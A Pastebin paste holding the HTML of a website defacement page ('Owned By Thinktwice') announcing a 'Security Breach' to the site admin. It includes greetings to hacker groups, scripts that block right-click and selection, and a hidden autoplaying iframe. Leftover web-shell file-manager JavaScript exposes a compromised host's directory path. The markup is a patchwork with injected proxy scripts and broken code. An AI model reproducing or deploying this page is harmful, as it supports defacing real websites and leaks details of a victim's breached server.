GTx1TechTeam

Gabriel

Jul 13th, 2013
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.79 KB | None | 0 0
  1. <html>
  2. <link rel="SHORTCUT ICON" href="http://i1275.photobucket.com/albums/y445/yukii_santos23/217760_138520882973158_430509640_n_zps51f5298b.jpg">
  3. <link href='http://fonts.googleapis.com/css?family=Pirata+One' rel='stylesheet' type='text/css'>
  4. <TITLE>Owned By Thinktwice</TITLE>
  5. <center>
  6. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
  7. <body bgcolor=black>
  8. <font face="Pirata One" size="10" color="black" style="text-shadow: 1px 0px .1em gold, -1px 1px .1em gold, -1px -1px .1em black"><b><font size='10'>
  9. <font style="text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0); color: rgb(255, 255, 255); font-weight: bold;">
  10. <font style="color:yellow;size="5";text-align: center;font-family:Pirata One; text-shadow: 3px 3px 3px yellow;">
  11. [+]-->Thinktwice<--[+]<br></font></center>
  12. <center>
  13. <style>
  14. html{
  15. cursor:no-drop;
  16. }
  17.  
  18. body{
  19. background-image: url(); background-position : 80%;background-color: #000000;
  20. font: 10pt Verdana;
  21. cursor:no-drop;
  22. }
  23. tr {
  24. BORDER-RIGHT: #000 3px solid;
  25. BORDER-TOP: #000 3px solid;
  26. BORDER-LEFT: #000 3px solid;
  27. BORDER-BOTTOM: #000 3px solid;
  28. color: #ff9900;
  29. }
  30. td {
  31. BORDER-RIGHT: #000 3px solid; BORDER-RIGHT: #000 3px solid;
  32.  
  33. BORDER-TOP: #000 3px solid;
  34. BORDER-LEFT: #000 3px solid;
  35. BORDER-BOTTOM: #000 3px solid;
  36. color: #000;
  37. font: 10pt Verdana;
  38. }
  39.  
  40. table { background-image: url(http://www.greatacoustics.org/wp-content/uploads/2008/11/197149.jpg);
  41.  
  42.  
  43. }
  44.  
  45.  
  46. input {
  47. BORDER-RIGHT: #000000 1px solid;
  48. BORDER-TOP: #000000 1px solid;
  49. BORDER-LEFT: #000000 1px solid;
  50. BORDER-BOTTOM: #000000 1px solid;
  51. BACKGROUND-COLOR: Black;
  52. font: 10pt Verdana;
  53. color: #ff9900;
  54. }
  55.  
  56. input.submit {
  57. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  58. color: #FFFFFF;
  59. border-color: #009900;
  60. }
  61.  
  62. code {
  63. border : dashed 0px #333;
  64. BACKGROUND-COLOR: Black;
  65. font: 10pt Verdana bold;
  66. color: while;
  67. }
  68.  
  69. run {
  70. border : dashed 0px #333;
  71. font: 10pt Verdana bold;
  72. color: #FF00AA;
  73. }
  74.  
  75. textarea {
  76. BORDER-RIGHT: #3e3e3e 1px solid;
  77. BORDER-TOP: #3e3e3e 1px solid;
  78. BORDER-LEFT: #3e3e3e 1px solid;
  79. BORDER-BOTTOM: #3e3e3e 1px solid;
  80. BACKGROUND-COLOR: #1b1b1b;
  81. font: Fixedsys bold;
  82. color: #aaa;
  83. }
  84. A:link {
  85. COLOR: #2BA8EC; TEXT-DECORATION: none
  86. }
  87. A:visited {
  88. COLOR: #2BA8EC; TEXT-DECORATION: none
  89. }
  90. A:hover {
  91. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  92. color: #ff9900; TEXT-DECORATION: none
  93. }
  94. A:active {
  95. color: Red; TEXT-DECORATION: none
  96. }
  97.  
  98. .listdir tr:hover{
  99. background: #444;
  100. }
  101. .listdir tr:hover td{
  102. background: #444;
  103. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  104. color: #FFFFFF; TEXT-DECORATION: none;
  105. }
  106. .notline{
  107. background: #111;
  108. }
  109. .line{
  110. background: #222;
  111. }
  112. </style><script language="javascript">
  113. function chmod_form(i,file)
  114. {
  115. /*var ajax='ajax_PostData("FormPerms_'+i+'","/site/wp-content/themes/twenty/cgi2012/cgi2012.izo","ResponseData"); return false;';*/
  116. var ajax="";
  117. document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit
  118.  
  119. class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='/home/villahou/public_html/site/wp-content/themes/twenty/cgi2012'><input type=hidden
  120.  
  121. name=f value='"+file+"'></form>";
  122. document.getElementById("text_" + i).focus();
  123. }
  124. function rm_chmod_form(response,i,perms,file)
  125. {
  126. response.innerHTML = "<span onclick="chmod_form(" + i + ",'"+ file+ "')" >"+ perms +"</span></td>";
  127. }
  128. function rename_form(i,file,f)
  129. {
  130. var ajax="";
  131. f.replace(/\/g,"\\");
  132. var back="rm_rename_form("+i+",""+file+"",""+f+""); return false;";
  133. document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit
  134.  
  135. class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d
  136.  
  137. value='/home/villahou/public_html/site/wp-content/themes/twenty/cgi2012'><input type=hidden name=f value='"+file+"'></form>";
  138. document.getElementById("text_" + i).focus();
  139. }
  140. function rm_rename_form(i,file,f)
  141. {
  142. if(f=='f')
  143. {
  144. document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=/home/villahou/public_html/site/wp-content/themes/twenty/cgi2012&c=edit%20"+file+"%20'>" +file+ "</a>";
  145. }else
  146. {
  147. document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  148. }
  149. }
  150. </script></head>
  151.  
  152.  
  153. <body onload="document.f.p.focus()" topmargin="0" leftmargin="0" bgcolor="#0c0c0c" marginheight="0" marginwidth="0"><script type="text/javascript">ANCHORFREE_VERSION="623161526"</script><script type="text/javascript">var _AF2$={'SN':'HSSHIELD00PK','IP':'216.172.135.211','CH':'HSSCNL000387','CT':'XX','HST':'','AFH':'hss91','RN':Math.floor(Math.random()*999),'TOP':(parent.location!=document.location||top.location!=document.location)?0:1,'AFVER':'2.88','fbw':false,'FBWCNT':0, 'FBWCNTNAME':'FBWCNT_CHROME', 'NOFBWNAME':'NO_FBW_CHROME'};if(/^(.*,)?(11C)(,.*)?$/g.exec(_AF2$.CT)!=null&&_AF2$.CH!='HSSCNL000242'){document.write("<scr"+"ipt src='http://box.anchorfree.net/insert/par.js?v="+ANCHORFREE_VERSION+"' type='text/javascript'></scr"+"ipt>")}document.write("<style type='text/css' title='AFc_css"+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{} .AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+":visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>");</script><style type="text/css" title="AFc_css270">.AFc_body270{} .AFc_all270,a.AFc_all270:hover,a.AFc_all270:visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style><style type="text/css">AFhss_dpnone{display:none;width:0;height:0}</style><img src="Hacked%20By%20Titak%20Security%20Team_files/a" id="AFhss_trk0" name="AFhss_trk0" style="display:none;width:0"><img src="Hacked%20By%20Titak%20Security%20Team_files/a" id="AFhss_trk" name="AFhss_trk" style="display:none;width:0"><div id="AFhss_dfs" class="AFhss_dpnone"><div id="AFhss_adrp0" class="AFhss_dpnone"></div><div id="AFhss_adrp1" class="AFhss_dpnone"></div><div id="AFhss_adrp2" class="AFhss_dpnone"></div><div id="AFhss_adrp3" class="AFhss_dpnone"></div><div id="AFhss_adrp4" class="AFhss_dpnone"></div><div id="AFhss_adrp5" class="AFhss_dpnone"></div><div id="AFhss_adrp6" class="AFhss_dpnone"></div><div id="AFhss_adrp7" class="AFhss_dpnone"></div><div id="AFhss_adrp8" class="AFhss_dpnone"></div><div id="AFhss_adrp9" class="AFhss_dpnone"></div></div>
  154. <center><code>
  155. <table border="1" cellpadding="2" cellspacing="0" width="100%">
  156. <tbody><tr>
  157.  
  158.  
  159. </tr>
  160.  
  161. <tr>
  162.  
  163.  
  164.  
  165. </tr>
  166. </tbody></table>
  167. <font id="ResponseData" color="#ff99cc">
  168. <pre><script type="text/javascript">
  169. TypingText = function(element, interval, cursor, finishedCallback) {
  170. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  171. this.running = true; // Never run.
  172. return;
  173. }
  174. this.element = element;
  175. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  176. this.interval = (typeof interval == "undefined" ? 100 : interval);
  177. this.origText = this.element.innerHTML;
  178. this.unparsedOrigText = this.origText;
  179. this.cursor = (cursor ? cursor : "");
  180. this.currentText = "";
  181. this.currentChar =0;
  182. this.element.typingText = this;
  183. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  184. TypingText.all.push(this);
  185. this.running = false;
  186. this.inTag = false;
  187. this.tagBuffer = "";
  188. this.inHTMLEntity = false;
  189. this.HTMLEntityBuffer = "";
  190. }
  191. TypingText.all = new Array();
  192. TypingText.currentIndex = 0;
  193. TypingText.runAll = function() {
  194. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  195. }
  196. TypingText.prototype.run = function() {
  197. if(this.running) return;
  198. if(typeof this.origText == "undefined") {
  199. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
  200. return;
  201. }
  202. if(this.currentText == "") this.element.innerHTML = "";
  203. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  204. if(this.currentChar < this.origText.length) {
  205. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  206. this.tagBuffer = "<";
  207. this.inTag = true;
  208. this.currentChar++;
  209. this.run();
  210. return;
  211. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  212. this.tagBuffer += ">";
  213. this.inTag = false;
  214. this.currentText += this.tagBuffer;
  215. this.currentChar++;
  216. this.run();
  217. return;
  218. } else if(this.inTag) {
  219. this.tagBuffer += this.origText.charAt(this.currentChar);
  220. this.currentChar++;
  221. this.run();
  222. return;
  223. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  224. this.HTMLEntityBuffer = "&";
  225. this.inHTMLEntity = true;
  226. this.currentChar++;
  227. this.run();
  228. return;
  229. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  230. this.HTMLEntityBuffer += ";";
  231. this.inHTMLEntity = false;
  232. this.currentText += this.HTMLEntityBuffer;
  233. this.currentChar++;
  234. this.run();
  235. return;
  236. } else if(this.inHTMLEntity) {
  237. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  238. this.currentChar++;
  239. this.run();
  240. return;
  241. } else {
  242. this.currentText += this.origText.charAt(this.currentChar);
  243. }
  244. this.element.innerHTML = this.currentText;
  245. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  246. this.currentChar++;
  247. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  248. } else {
  249. this.currentText = "";
  250. this.currentChar = 0;
  251. this.running = false;
  252. this.finishedCallback();
  253. }
  254. }
  255. </script>
  256. <script>
  257. function disableselect(e){return false}
  258.  
  259. function reEnable(){return true}
  260.  
  261. //if IE4+
  262. document.onselectstart=new Function ("return false")
  263.  
  264. //if NS6
  265. if (window.sidebar){
  266. document.onmousedown=disableselect
  267. document.onclick=reEnable
  268. }
  269. </script>
  270. <script>
  271. var message="";
  272. function clickIE()
  273.  
  274. {if (document.all)
  275. {(message);return false;}}
  276.  
  277. function clickNS(e) {
  278. if
  279. (document.layers||(document.getElementById&&!document.all))
  280. {
  281. if (e.which==2||e.which==3) {(message);return false;}}}
  282. if (document.layers)
  283. {document.captureEvents(Event.MOUSEDOWN);document. onmousedown=clickNS;}
  284. else
  285. {document.onmouseup=clickNS;document.oncontextmenu =clickIE;}
  286.  
  287. document.oncontextmenu=new Function("return false")
  288. </script>
  289.  
  290. <center>
  291. <br><br><br><div style=" margin-top:-150px; margin-right: 400px;">
  292.  
  293. <table style=" height: 350 ; background-repeat: no-repeat;" heigh="" align="center" border="0" width="679" >
  294.  
  295.  
  296.  
  297. <tbody><tr>
  298. <td valign="top" ><p id="hack" style="margin-left: 7px;">
  299.  
  300. <br /><br />
  301. <font color="green"> Hello Admin </font> <br><br>
  302. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]Security Breach! </font> <br> </font> <br>
  303. </font> <br>
  304. <br>
  305. <font color="yellow"> [+]Greetz---> </font> <br> <br>
  306. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]Pinoy Vendetta - Stealth Shadows - Bisayan Hackerz - Anon Rogues - Anonymous Iligan - Anonymous Cebu -</font> <br>
  307. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]X-Legion Hackers - Cod3x Cyber Army - Sund4nyM0uz Corporation - Str4wHat Pirates - Pak Cyber Eaglez -</font> <br>
  308. <br>
  309. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]Patch Your System!
  310. </br>
  311. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]No Files Have Been Remove or Deleted..
  312. <br>
  313. <br>
  314. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]Contact :www.facebook.com/Twic3Think</font><br>
  315. <br>
  316. <br>
  317. <font color="yellow"> &nbsp;&nbsp;&nbsp;&nbsp;[-]./Sign Out!..
  318.  
  319. <font color="#F00000"></font><br>
  320. </p></tr>
  321. </tbody></table> </div>
  322. <br>
  323.  
  324. <script type="text/javascript">
  325. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  326. TypingText.runAll();
  327.  
  328. </script>
  329. <br>
  330.  
  331.  
  332. <center><iframe width="1" height="1"
  333. src="http://www.youtube.com/embed/oaGeoGMeq2g?rel=0&autoplay=1&loop=1&playlist=yNjJCbWc6YA" frameborder="0"
  334. allowfullscreen></iframe></center>
Add Comment
Please, Sign In to add comment